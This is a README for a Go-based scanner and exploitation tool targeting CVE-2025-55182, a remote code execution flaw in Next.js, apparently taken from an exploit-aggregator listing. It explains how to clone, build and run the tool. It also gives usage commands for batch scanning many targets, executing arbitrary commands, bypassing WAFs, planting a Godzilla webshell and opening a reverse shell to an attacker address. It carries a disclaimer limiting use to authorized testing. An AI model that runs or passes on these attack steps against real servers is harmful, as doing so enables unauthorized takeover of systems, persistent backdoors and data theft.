## https://sploitus.com/exploit?id=A6835FCF-13F7-5DDA-8327-7B6072FBEA01
# CVE-2025-55182 Next.js RCE Scanner
[](LICENSE)
CVE-2025-55182 is a vulnerability scanning and exploitation tool targeting remote code execution vulnerabilities in Next.js applications. It supports batch detection, command execution, Godzilla Meme injection, and shell reverse-shell functions. > ā ļø **This tool is intended only for security research and authorized testing purposes. Do not use it for illegal purposes.**
## Features
- **Multi-target scanning**: Supports single URLs, file lists (one URL per line), and folders containing multiple `.txt` files.
- **Multi-thread concurrency**: Customizable thread count for improved scanning efficiency.
- **Vulnerability validation**: Verifies the presence of vulnerabilities by calculating random number products.
- **Command execution**: Executes arbitrary system commands on targeted vulnerabilities (support for Linux and Windows).
- **Godzilla Meme injection**: Quickly generates Godzilla Meme connection information.
- **Shell reverse-shell**: Supports shell reverse-shell functions.
- **Result saving**: Automatically saves successfully exploited URLs and detailed information to `success.json`. Optionally, exploits can be exported to specified files.
- **Proxy support**: Configurable HTTP proxy for integration with tools like Burp Suite.
- **Progress display**: Real-time display of scanning progress, elapsed time, and estimated remaining time. []
## Installation
### Prerequisites
- Go 1.16 or higher
- Git
### Clone the repository
```bash
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
```
### Compile
```bash
go build -o cve-2025-55182 main.go
```
### Run
```bash
./cve-2025-55182 -h
```
## Usage
### Parameter Description
| Parameter | Type | Default | Description |
|----------|-------|---------|---------|
| `-u` | string | None | Single target URL (e.g., `http://example.com:3000`) |
| `-f` | string | None | File containing a list of URLs (one URL per line) |
| `-d` | string | None | Folder containing multiple `.txt` files |
| `-o` | string | None | Output file (stores vulnerability URLs, one per line) |
| `-t` | int | 10 | Number of concurrent threads |
| `-to` | int | 10 | Request timeout (seconds) |
| `-c` | string | None | Command to execute (e.g., `id`) |
| `-m` | string | None | Mode: `waf` (enable WAF bypass) |
| `-p` | string | None | HTTP proxy (e.g., `http://127.0.0.1:8080`) |
| `-g` | bool | false | Enable Godzilla Meme injection |
| `-rs` | string | None | Reverse-shell address (format: `IP:PORT`) |
| `-dv` | bool | false | Detailed mode (prints the scanning process for each URL) |
| `-es` | bool | false | Sensitive information scanning mode |
### Examples
#### Scanning a single target
```bash
./cve-2025-55182 -u http://target.com:3000
```
#### Batch scanning for targets in files
```bash
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
```
#### Executing a command
```bash
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
```
#### Using Godzilla Meme
```bash
./cve-2025-55182 -u http://target.com:3000 -g
```
After successful injection, the tool will output Godzillaās connection address, password, key, and request headers. #### Reverse-shell
```bash
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
```
#### Using a proxy
```bash
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
```
## Output Explanation
- **`success.json`**: Automatically saves detailed information about all successfully exploited targets (including command outputs and Godzilla configurations).
- **Output file specified by `-o`**: Stores a list of vulnerability URLs (one per line). During scanning, progress bars and discovered vulnerabilities are displayed in real-time, with final statistics provided.
## Notes
1. **Authorized use**: Unauthorized scanning or attacking othersā systems is illegal.
2. **Proxy usage**: If you need to view traffic using Burp Suite, use the `-p` parameter to set the proxy.
3. **Godzilla connection**: After successfully injecting Godzilla, connect using Godzillaās client. Note that both the password and key are randomly generated.
4. **Timeout setting**: For targets with poor network conditions, increase the `-to` parameter value accordingly.
## Disclaimer
This tool is used solely for security research and authorized testing purposes. Users must bear all legal responsibilities. The developer does not assume responsibility for any misuse.
## License
[MIT](LICENSE)
[source-iocs-preserved url=http://127.0.0.1:8080`ļ¼,http://example.com:3000`ļ¼]